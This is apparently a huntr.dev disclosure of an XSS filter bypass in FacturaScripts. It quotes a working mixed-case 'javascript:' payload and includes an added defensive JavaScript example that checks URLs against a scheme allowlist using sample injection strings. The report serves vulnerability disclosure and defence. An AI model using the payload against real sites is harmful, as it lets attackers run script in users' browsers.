XSS bypass in neorazorx/facturascripts

Valid

Reported on

May 18th 2022


Description

XSS check bypassed

Proof of Concept

The fix for this bug (https://huntr.dev/bounties/2adf903d-cab1-4ca8-8236-b6315f0fdaba/) can be bypassed using the payload below:

jAvAsCriPt://sadas.com/%0aalert(11);//

Impact

XSS check bypass
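A defensive check for URL values shaped like the payload above, as an added example that is not part of the original report or of the facturascripts code: it parses the value the way a browser does and allows only known-good schemes. The function names, the `BASE` origin, the allowed scheme list and the weak check shown for contrast are all assumptions made for illustration.

```javascript
// Added example (not project code): scheme allowlist for user-supplied link URLs.
// All names and the BASE origin below are hypothetical.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);
const BASE = "https://app.example/"; // placeholder origin used to resolve relative links

// Hypothetical weak check, for contrast: case-sensitive blocklist on the raw string.
function naiveBlocklistCheck(input) {
  return !input.startsWith("javascript:");
}

// The WHATWG URL parser lowercases the scheme, drops tabs and newlines, and
// trims leading/trailing spaces and control characters, so url.protocol is
// the scheme a browser would actually act on.
function isAllowedLinkUrl(input) {
  let url;
  try {
    url = new URL(input, BASE);
  } catch {
    return false; // unparseable input is rejected, never passed through
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

// Constructed sample inputs; the first is the payload quoted in the report.
const samples = [
  "jAvAsCriPt://sadas.com/%0aalert(11);//",
  "java\tscript:alert(1)",
  " JAVASCRIPT:alert(1)",
  "data:text/html,<b>x</b>",
  "https://example.com/invoice?id=1",
  "/relative/page?code=1",
];

// Run both checks over a list so the difference is visible per input.
function classify(list) {
  return list.map((s) => ({
    input: s,
    naive: naiveBlocklistCheck(s),
    allowlist: isAllowedLinkUrl(s),
  }));
}

console.table(classify(samples));
```

Output encoding at the point where the URL is written into HTML is still required; the allowlist only decides which schemes may reach that point.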

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a year ago
ranjit-git modified the report a year ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a year ago
Carlos Garcia validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia marked this as fixed in 2022.08 with commit 0ff056 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE